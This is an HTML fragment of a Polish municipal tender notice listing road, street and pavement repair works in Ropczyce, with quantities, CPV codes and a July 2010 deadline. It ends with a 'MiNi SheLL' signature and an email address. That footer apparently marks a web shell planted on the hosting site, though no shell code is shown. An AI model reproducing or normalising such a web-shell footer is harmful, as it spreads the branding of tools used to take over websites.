<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie Nr 8
Remont drogi gminnej  Ropczyce-Chechły Na Bulszę na  długości 200 mb w km                    od 0+000 do 0+200 CPV 45-23-31-42-6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje:
1.Profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni, wykonane przy użyciu równiarki samojezdnej - 1 godz
2.Górna warstwa podbudowy z kruszywa łamanego klinowanego klińcem, grubość warstwy po zagęszczeniu 15 cm - 640 m2
3.Mechaniczne wyrównanie istniejącej nawierzchni mieszanką mineralno - bitumiczną w ilości           50 kg/m2 - 640 m2
4.Mechaniczne wykonanie nawierzchni ścieralnej        z masy mineralno - bitumicznej, standard II, grubość warstwy po zagęszczeniu  5cm - 640 m2
5.Ręczne formowanie                                i zagęszczanie nasypów       z ziemi dostarczanej samochodami samowyładowczymi grunt kat. III-IV ( uzupełnienie poboczy ) - 64 m3
6.Uzupełnienie poboczy wraz z ich zagęszczeniem kruszywem kamiennym 4 -32 mm przy gr. w-wy 6 cm - 120 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie Nr 9
Remont drogi gminnej  Ropczyce-Chechły Na Pietryckiego na  długości 200 mb w km  od 0+000 do 0+200 CPV 45-23-31-42-6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje:
1.Profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni, wykonane przy użyciu równiarki samojezdnej - 1 godz
2.Górna warstwa podbudowy z kruszywa łamanego klinowanego klińcem, grubość warstwy po zagęszczeniu 15 cm - 675 m2
3.Mechaniczne wyrównanie istniejącej nawierzchni mieszanką mineralno - bitumiczną w ilości           50 kg/m2 - 675 m2
4.Mechaniczne wykonanie nawierzchni ścieralnej        z masy mineralno - bitumicznej, standard II, grubość warstwy po zagęszczeniu  5cm - 675 m2
5.Ręczne formowanie                                i zagęszczanie nasypów       z ziemi dostarczanej samochodami samowyładowczymi grunt kat. III-IV ( uzupełnienie poboczy ) - 64 m3
6.Uzupełnienie poboczy wraz z ich zagęszczeniem kruszywem kamiennym 4-32 mm przy gr. w-wy 6 cm - 120 m2
7.Mechaniczne oczyszczanie koparką podsiębierną o poj. łyżki do 0,4 m3 w gr. kat. IV z odwozem urobku samoch. samowył. na odległość do 1 km, rowów z namułu przy grubości do 30 cm z wyprofilowaniem dna            i skarp rowu - 200 mb.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie Nr 10
Remont drogi gminnej  Ropczyce-Chechły Na Kurcową na  długości 300 mb w km od 0+000 do 0+300 CPV 45-23-31-42-6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje:
1.Profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni, wykonane przy użyciu równiarki samojezdnej - 1 godz
2.Górna warstwa podbudowy z kruszywa łamanego klinowanego klińcem, grubość warstwy po zagęszczeniu 15 cm - 950 m2
3.Mechaniczne wyrównanie istniejącej nawierzchni mieszanką mineralno - bitumiczną w ilości           50 kg/m2 - 950 m2
4.Mechaniczne wykonanie nawierzchni ścieralnej        z masy mineralno - bitumicznej, standard II, grubość warstwy po zagęszczeniu  5cm - 950 m2
5.Ręczne formowanie                                i zagęszczanie nasypów       z ziemi dostarczanej samochodami samowyładowczymi grunt kat. III-IV ( uzupełnienie poboczy ) - 51 m3
6.Uzupełnienie poboczy wraz z ich zagęszczeniem kruszywem kamiennym 4-32 mm przy gr. w-wy 6 cm - 180 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie Nr 11
Remont ulicy Torowej w Ropczycach na długości 250 mb w km od 0+250 do 0+500              CPV 45-23-31-42-6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje:
1.Profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni, wykonane przy użyciu równiarki samojezdnej - 1 godz
2.Górna warstwa podbudowy z kruszywa łamanego klinowanego klińcem, grubość warstwy po zagęszczeniu 15 cm - 800 m2
3.Mechaniczne wyrównanie istniejącej nawierzchni mieszanką mineralno - bitumiczną w ilości           50 kg/m2 - 800 m2
4.Mechaniczne wykonanie nawierzchni ścieralnej        z masy mineralno - bitumicznej, standard II, grubość warstwy po zagęszczeniu  5cm800 m2
5. Ręczne formowanie                                i zagęszczanie nasypów       z ziemi dostarczanej samochodami samowyładowczymi grunt kat. III-IV ( uzupełnienie poboczy ) - 55 m3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie Nr 12
Remont ulicy Spokojnej w Ropczycach na długości 400 mb w km od 0+000 do 0+400                          CPV 45-23-31-42-6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zakres robót obejmuje:
1.Mechaniczne oczyszczenie istniejącej nawierzchni bitumicznej - 1360 m2
2.Wyrównanie istniejącej podbudowy ( wzmocnienie) tłuczniem kamiennym wraz zaklinowaniem klińcem,  w-wa po zagęszczeniu grub. 10 cm - 300 m2
3.Mechaniczne wyrównanie istniejącej nawierzchni mieszanką mineralno - bitumiczną w ilości 75 kg/m2 - 1360 m2
4.Mechaniczne wykonanie nawierzchni ścieralnej   z masy mineralno-bitumicznej, 
standard II, grubość warstwy po zagęszczeniu  5 cm - 1360 m2
5.Uzupełnienie poboczy wraz z ich zagęszczeniem kruszywem kamiennym 4-32 mm przy gr. 8 cm - 300 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie Nr 13
Remont drogi gminnej  Ropczyce - Pietrzejowa na Moskwę na  długości 360 mb w km od 0+000 do 0+360 CPV 45-23-31-42-6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje:
1.Mechaniczne oczyszczenie istniejącej nawierzchni bitumicznej - 10-80 m2
2.Wyrównanie istniejącej podbudowy ( wzmocnienie) tłuczniem kamiennym wraz zaklinowaniem klińcem,  w-wa po zagęszczeniu grub. 10 cm - 300 m2
3.Mechaniczne wyrównanie istniejącej nawierzchni mieszanką mineralno - bitumiczną w ilości 75 kg/m2 - 1080 m2
4.Mechaniczne wykonanie nawierzchni ścieralnej   z masy mineralno-bitumicznej, 
standard II, grubość warstwy po zagęszczeniu  5 cm - 1080 m2
5.Uzupełnienie poboczy wraz z ich zagęszczeniem kruszywem kamiennym 4 -32 mm przy gr. 8 cm - 216 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie Nr 14
Remont chodnika na ul. Wyspiańskiego na odcinku o długości  340 mb                              w km 0+000 do 0+340 CPV 45-23-32-22-1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje:
1.Rozbiórka istniejącego krawężnika 15 x 30 na ławie betonowej wraz z odwiezieniem gruzu  na odl.do 1 km - 376 mb
2.Rozbiórka istniejącego obrzeża               6 x 20 na  podsypce piaskowej z odwiezieniem gruzu na odl. do 1km - 40 mb
3. Rozbiórka chodnika z kostki  bet. gr. 6 cm na podsypce cemen-piaskowej ze złożeniem na palety (do ponownego ułożenia) - 677 m2
4.Ustawienie krawężnika bet. 15 x 30 na ławie z betonu B-15 z oporem - 376 mb
5.Ustawienie obrzeża betonowego 8 x 30 na podsypce cem-piaskowej. - 86 mb
6.Wykonanie chodnika z kostki bet. gr. 6 cm na podsypce cement -piaskowej o gr. 3 cm w tym 20 % kolor czerwony - 691 m2
7.Ręczne wykonanie nawierzchni z masy bit. w-wa ścieralna gr. 5 cm ( uzupełnienie nawierzchni po wymianie krawężnika) - 105 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadanie Nr 15
Remont drogi gminnej  Niedźwiada - Na Kosińskiego na  długości 200 mb w km                  od 0+000 do 0+200 CPV 45-23-31-42-6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje:
1.Profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni, wykonane przy użyciu równiarki samojezdnej - 1 godz
2.Górna warstwa podbudowy z kruszywa łamanego klinowanego klińcem, grubość warstwy po zagęszczeniu 15 cm - 650 m2
3.Mechaniczne wyrównanie istniejącej nawierzchni mieszanką mineralno - bitumiczną w ilości           50 kg/m2 - 650 m2
4.Mechaniczne wykonanie nawierzchni ścieralnej        z masy mineralno - bitumicznej, standard II, grubość warstwy po zagęszczeniu  5cm - 650 m2
5.Ręczne formowanie                                i zagęszczanie nasypów       z ziemi dostarczanej samochodami samowyładowczymi grunt kat. III-IV ( uzupełnienie poboczy ) - 44 m3
6.Ręczne rozebranie podbudowy z kruszywa kamiennego o gr. 15 cm - 12 m2
7.Wykopy oraz przekopy wykonywane koparkami przedsiębiernymi 0,40 m3 na odkład w gruncie kat. IV- odkopanie rur w przepuście - 44 m3
8.Przepust rurowy bez piętrzenia P-1 na podłożu mineralnym sr. 100 cm- dług. Rurociągu 7 m- analogia- rozbiórka rurociągow o śred. 100 cm z mechanicznym wydobyciem rur - 14 mb
9. Wykonanie ławy pod przepust o śred 200 cm - ława fundamentowa betonowa , prostokątna o szer. Do 0,6 m, beton klasy B-15 - 11,05 m3
10.Wykonanie części przelotowej prefabrykowanych przepustów drogowych rurowych jednootworowych fi 200 cm - rury inwestora- dł. rurociągu - 7 m
11. Odbudowy wlotów ( wylotów) prefabrykowanych przepustów  drogowych rurowych ( fundament pod ścianki czołowe)- ławy fundamentowe betonowe, prostokątne szer. do 1,3 m - 4,0 m3
12. Ściany betonowe proste gr. 20 cm wys. Do 3 m- ścianki czołowe, beton  klasy B-15 - 6,86 m2
13. Ściany betonowe-dodatek za każdy 1 cm różnicy grubości- ścianki czołowe- beton klasy B-15 Krotność = `10 - 6,86 m2
14. Roboty ziemne wykon. Koparkami przedsiębiernymi o poj. Łyżki 0,15 m3 w gr. kat. III z trans. Urobku samoch. samowyładowczymi na odl. Do 1 km - analogia- dowiezienie ziemi na zasypanie przepustu i odtworzenie nasypów drogi w obrębie przepustu. - 12 m3
15. Przewóz rur żelbetowych z załadunkiem i wyładunkiem mechanicznym samochodami skrzyniowymi na odl. Do 1 km - 24,5 t
16. Przewóz rur żelbetowych samochodami skrzyniowymi- za każdy nast. 1 km
Krotność = 4 - 24,5 t.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com